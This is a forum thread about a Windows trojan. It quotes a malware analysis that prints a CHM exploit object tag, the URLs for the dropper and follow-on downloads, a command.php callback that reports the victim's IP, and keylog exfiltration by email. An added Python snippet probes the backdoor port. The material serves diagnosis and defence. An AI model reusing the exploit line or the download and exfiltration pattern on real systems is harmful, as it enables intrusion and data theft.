
Thread: WINEXPLOR and MSITS

  1. #1

    WINEXPLOR and MSITS

    they are located in c:\WINDOWS\SYSTEM32
    and they start automatically: Msits.exe ("Mysoft") at Windows startup; Winexplor.exe, I haven't figured out when or how it starts

    there's nothing about them on Google

    I suddenly found them in the Task list on Windows 98SE
    when I got suspicious about 2 things:
    1) system resources were being exhausted in an instant
    2) when I open a site with Explorer it opens a porn site in its place; but the strange thing is that:
    - in the options the default home page is set to "blank"
    - once that site has opened you lose control of the browser
    - I'm reasonably "expert" on the traps out there on the internet ...but I don't think I've done anything at all dangerous lately
    - the firewall (Outpost) doesn't detect anything

    enough to make you swear ...but technically remarkable :quipy:

    the problem is: what do I do? is it enough to delete the exes and remove them from autostart? is that enough?
    Jarno's Pharmacy - my pills: Cookie [#780810], Dom4Php4 [#1123236], Fade [#1139489], getCssProperty [#1152911]
    Bow before the Prof! Nacchio!

    It seems to me that mankind moves forward in reverse gear

  2. #2
    it seems only one site talks about it:

    http://spamwatch.codefish.net.au/mod...rder=0&thold=0

    it gives a precise analysis of everything that happens on the PC ...stuff from another world ...there's no way to avoid it or to notice it.
    But it doesn't say what we're supposed to do

    the name looks interesting:
    "The Naked Blonde Trojan"
    ...but I have no idea where it came from :quipy:
    ...if only it lived up to its name, I mean, if only it showed me a few blondes :quipy:

  3. #3
    makuro (HTML.it user; registered Apr 2004; 676 posts)
    Originally posted by Jarno
    it gives a precise analysis of everything that happens on the PC ...stuff from another world ...there's no way to avoid it or to notice it.
    But it doesn't say what we're supposed to do
    Hi,
    right now I can't follow the link, but what do you mean there's no way to avoid it or to notice it? Can you post the description given on the site, if it isn't too long?

    Regards,
    Roberto
    Desine fata deum flecti sperare precando.

  4. #4
    I'm not a super technical person, but as far as I understand, to get into this mess it's enough to read an ordinary web page :di56:

    in fact I've never opened attachments, installed anything from the browser, or run any strange EXE



    ________________________
    Type: Trojan (lures you to a website to be infected by a trojan)
    Domain(s)/IP Address(es) used: 210.73.87.129 (Chinese Network)
    Exact Link: http://210.73.87.129:4903/i/index.htm
    Email's Originating Network(s): Multiple
    Danger Level: Medium

    Description

    Yet another trojan site using the Microsoft Windows CHM exploit. What's interesting about this one is the lure. We got two slightly different copies of the email to one of our inboxes in quick succession. A quick glance at them put them down to just general spam but something about them didn't seem quite right. We decided to look further into it and were rewarded with a trojan site. The email looks like this:

    Greetings, probably you have already forgot me. We spend a nice time together last summer in Miami. Im Nataly, a blonde to whom you have confessed in love in the seacoast. It is a pity, that you have never called, but at last I managed to scan the photos you have been asking for (where Im naked). I hope they will help you to recover the memories and to call me.

    it's my site

    Valery

    The name at the end changes at random but the message stays the same. What's weird about it is we don't expect a lot of people would follow the link. Most would just regard the email as spam and delete it. We suppose that a small number may think it's an email gone astray to them and follow the link out of curiosity but we can't see the lure being all that popular.

    The email is simple HTML and contains some extra text that's been set to white so that it doesn't display. This text is just random phrases designed to help the email bypass spam filters. Some examples of the random phrases:

    be careful MIRC in 1820
    in 1996 to go there in 1870
    in 1887 Keep well! Movies smart

    The rest of the email is basically just plain text. The bit that says "it's my site" is linked and goes to:

    http://210.73.87.129:4903/i/index.htm

    It was the fact the URL linked to a web server using an unusual port (4903 instead of port 80) that indicated that this email might be more sinister than your usual spam. We normally only see strange ports being used in phishing attempts or trojan sites. In this case a trojan site. We had a look at the linked site and found a web page that read:

    Please wait ~1 minute
    downloading...

    In big bright red letters. The page doesn't load anything else that is visible to the end user, who will probably just disregard the site or maybe catch on that something's not right. Something wasn't right. At the top of this web page is a line that reads:

    object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://<IP address>:4903//i//main.chm::/main.htm"type="text/x-scriptlet"

    (This line may trigger your anti-virus into stating this page is "infected". It's not and the way the text is displayed here it can not execute the exploit)

    This exploit is of course the CHM exploit in the Microsoft Windows system that is now very popular with trojan writers (link goes to MS patch page). What it basically does is use the contents of "main.chm" to download and execute rogue code on the system.

    To find out what exactly it did we fired up our victim Windows 2000 machine with its various tools and network monitoring and proceeded to open the page in Internet Explorer. The infection happens fairly fast. The page opens without fuss and very quickly, just by watching the traffic from the victim machine, it becomes obvious that something is doing a lot of work on the machine. The machine's CPU quickly hit 100% use and sat there. It appears something had gone wrong with the trojan and some processes it had spawned were consuming the resources of the machine. After killing off these processes we went over the logs of our forensics tools to try and follow the events of what had happened.

    The first half went as expected. The page opened and the CHM exploit executed in our unpatched Internet Explorer 6 window. This caused the machine to download the executable file at:

    http://210.73.87.129:4903/i/msits.exe

    This was written to a random file name on the machine and executed. This in turn created two new files:



    suchost.exe

    durta32.dll


    Both of these files were created in the main Windows directory (C:\WINNT on our 2000 machine). Once this was done the randomly named initial file was deleted from the system and "suchost.exe" is then executed. This is when the activity on the infected machine really kicks off.

    There was a flurry of network activity and file creation. The program "suchost.exe" began writing out information to a file called "sini.ini". Shortly after this was when the machine's CPU hit 100% usage and the victim machine almost became useless. There was no apparent explanation for that at this point, so we killed off the trojan process and had a look at the network logs and files that had been created. First a look at the files:

    msits.exe

    Seems to be a compressed file containing what will be both "suchost.exe" and "durta32.dll". According to what we can see this file is apparently compressed with UPX (a common file packer) but when we tried to unpack it with our usual UPX unpacker it didn't seem able to do it, as the file may have been modified. We'll be looking for new ways to unpack this file. As such the strings output of this file is giving us limited information.

    durta32.dll

    This file was not packed and showed clearly that it played a part in hooking directly into the keyboard and mouse subsystems of Windows, allowing any program using this DLL (Dynamic Link Library) to capture all keystrokes on the system.

    suchost.exe

    Ah, jackpot. This file was also unpacked and the strings output of this revealed a lot of information. It also matched the information we were finding in our network logs. Once launched this program attempts to download the following executables:

    http://ash.phpwebhosting.com/~lksdfsdfeww/taskmng.exe
    http://ash.phpwebhosting.com/~hgjhgjhasd/svhost.exe
    http://ash.phpwebhosting.com/~ewksfdp/mstss.exe

    PHPWebHosting.com is a cheap web hosting company who have been around a while so it's certain they are not involved in the trojan code. It appears that the trojaner may have compromised an account on the hoster to place their files there. Not that it helps, as a request for any of those files ends in a 404 (file not found). Bear this in mind as it appears to be the source of problems for the trojan later down the track.

    It then makes a request like so:

    http://ash.phpwebhosting.com/~ydfkjfdbw/command.php?IP=<IP Address of Infected Machine>&

    So in our victim machines case it sends:

    http://ash.phpwebhosting.com/~ydfkjf...IP=10.0.0.197&

    This does work as command.php does exist on the remote system. This responds with the sent IP address and a time date stamp. This is probably a method to inform the trojaners where in cyber space the infected machine is and when it was infected.

    This is when the trojan hits trouble. When we looked at the machine we found that "suchost.exe" had spawned several copies of "NTVDM.EXE" which were consuming the machine's entire resources. After doing some searching we found that "NTVDM.EXE" is a legitimate part of Windows and is a 16-bit virtual machine used to execute code of certain sorts. What we think is happening is that the "suchost.exe" component has no error checking to deal with the fact that the files it wants to download aren't there. Because the hoster's 404 system redirects to a generic 404 page and doesn't return a 404 error code, the trojan downloads the HTML of the 404 page to the executable name it wants to run, which it then attempts to run via "NTVDM.EXE". Because HTML is not valid machine code this seems to throw the system right out as it tries to deal with it. We don't have any evidence that this is what happens but considering that all three files requested give 404's and that three instances of NTVDM.EXE are spawned it does make some sense.

    After killing off the rogue NTVDM.EXE instances we were able to free the machine up enough to see what else was happening. Our forensics tools showed that it was constantly writing out to the "sini.ini" file in the main Windows directory. A quick look at the file revealed that it was a log file that was recording the title of the current active window and the time it was active. It also logged any keystrokes entered into the system.

    In addition to this it also opened port 10002 to the world. This port was the same each time we ran the infection so we assume that it's hard coded. When we tried to telnet to the port we were rewarded with the following text:

    C:\WINNT
    C:\WINNT\System32

    We didn't seem to be able to pass it any commands directly so it appears that it's probably a custom backdoor onto the system.

    Since the trojan didn't seem to do much else after this point other than occasionally try to redownload the missed files, triggering the CPU consumption on the system again, we killed it off and investigated the strings output in order to see if we could find out any more. What we found was three things.

    First was that it should have attempted to create a file on the system called "surte.exe". We found that this file did exist in the system32 directory but wasn't binary at all but contained the 404 HTML page, which seemed to bear out our theory of the trojan going astray and trying to execute non-executable code.

    The second was that the trojan looks like it was set up to email the keylogs back to an email address. It had its own SMTP engine built in that was set to talk directly to the following IP address:

    80.67.174.57

    This is the mail server for the altern.org domain, which appears to be a French domain that supplies free web mail accounts. It's not surprising then that the email address the trojan is set to deliver its payload to is:

    poiuyyy@altern.org

    By the looks of it the email delivers the current contents of the "sini.ini" to that address.

    The third thing was that it also appeared to post some information to the script at:

    http://ash.phpwebhosting.com/~ydfkjfdbw/post.php

    This file does exist on the system and returns a blank page for anything we posted to it. We assume it stores information about the infected PC on the server.

    Other than that we can only deduce that the trojan also inserts a registry entry into the system to ensure that it gets run at boot. It seems that without the rest of the files that it wants to download this trojan by itself is a non-targeted keylogger, but in its current state it becomes highly detectable by the fact that moments after infection the machine's CPU level hits 100%.

    The machine being used to host the initial viral site appears to be a compromised Windows web/mail server in China. Several potential backdoors appear open on it as well as many ports well known to be exploitable.

    Extra Information

    Copy of the email

    Second copy of the email

    Port scan of server used to host initial viral site

    Strings output of "msits.exe" - Apparently packed. No unpacked version as yet

    Strings output of "durta32.dll" - No unpacking needed

    Strings output of "suchost.exe" - No unpacking needed

    Example of material logged in "sini.ini"

    Screen shot showing the viral "loading" page

    Screen shot showing "suchost.exe" running on the infected system - Also shows the three spawned "NTVDM.EXE" instances

    Screen shot showing some more information of one of the "NTVDM.EXE" instances

    Screen shot showing "suchost.exe" listening on port 10002

  5. #5
    makuro (HTML.it user; registered Apr 2004; 676 posts)
    Well, interesting stuff... Are you sure it has anything to do with your problem? Anyway, let's sum up a few things:
    you only catch the trojan if you follow the link in the email, which takes you to the Chinese site, which in turn uses a Microsoft vulnerability to install the malicious little program.
    So if you don't follow the link and you have the patches installed, you're safe.

    From what's written there, not everything works perfectly, and some of the pages from which it would download versions of suspect executables aren't there any more...

    Check whether the trojan is running on your machine... telnet localhost 10002. If it answers, the backdoor is active.
    As far as I understand, data about the PC's usage is sent out.

    Anyway, if you remove the executable from autostart you should stop the trojan.

    And patch the system as soon as possible...

    Regards,
    Roberto
    Desine fata deum flecti sperare precando.
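
Roberto's check (`telnet localhost 10002`) done programmatically, as an added example that is not from the thread: connect with a timeout, collect whatever the listener volunteers, and compare it with the two directory lines the quoted analysis reported seeing on port 10002. `start_fake_listener` is a loopback test harness that mimics that banner so the check can be exercised without an infected machine; the host, port and banner are taken from the analysis above, the rest is assumed.

```python
import socket
import threading

# Banner the quoted analysis saw when telnetting to the trojan's port 10002.
KNOWN_BANNER_LINES = (b"C:\\WINNT", b"C:\\WINNT\\System32")

def probe_backdoor(host="127.0.0.1", port=10002, timeout=2.0):
    """Return the bytes a listener on host:port sends unprompted (b"" if it is
    open but silent), or None if nothing is listening / the connect times out."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            chunks = []
            try:
                while True:
                    data = s.recv(4096)
                    if not data:          # peer closed: banner is complete
                        break
                    chunks.append(data)
            except socket.timeout:
                pass                      # peer went quiet; keep what we have
            return b"".join(chunks)
    except (ConnectionRefusedError, socket.timeout, OSError):
        return None

def looks_like_suchost_banner(banner):
    """True when every known banner line appears (case-insensitive) in the reply."""
    if not banner:
        return False
    lines = [line.strip().upper() for line in banner.splitlines()]
    return all(known.upper() in lines for known in KNOWN_BANNER_LINES)

def start_fake_listener(banner, host="127.0.0.1"):
    """Test harness only: a loopback listener that sends `banner` once and hangs up.
    Returns the ephemeral port it is bound to."""
    srv = socket.socket()
    srv.bind((host, 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        conn.sendall(banner)
        conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

if __name__ == "__main__":
    reply = probe_backdoor("127.0.0.1", 10002)
    if reply is None:
        print("port 10002: nothing listening right now")
    elif looks_like_suchost_banner(reply):
        print("port 10002: suchost-style banner, backdoor is active:", reply)
    else:
        print("port 10002: open, but banner does not match:", reply)
```

A closed port only means nothing is listening at that moment on the loopback interface; the analysis says the port was opened "to the world", so the exposure that matters is what another host on the network sees. The probe is a confirmation, not a remedy: the fix is still removing the autostart entry and patching, as the post above says.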

  6. #6
    amvinfe (Moderator, Computer Security and Viruses; registered May 2002; 6,739 posts)
    This time I edited the URLs myself so that they aren't clickable; the next time dangerous addresses are posted in the forum (even if these led to a 404 error because the pages have been removed), the thread will be closed or deleted


    Marco(amvinfe)
    ==
    Visit my blog SuspectFile.com
    ==
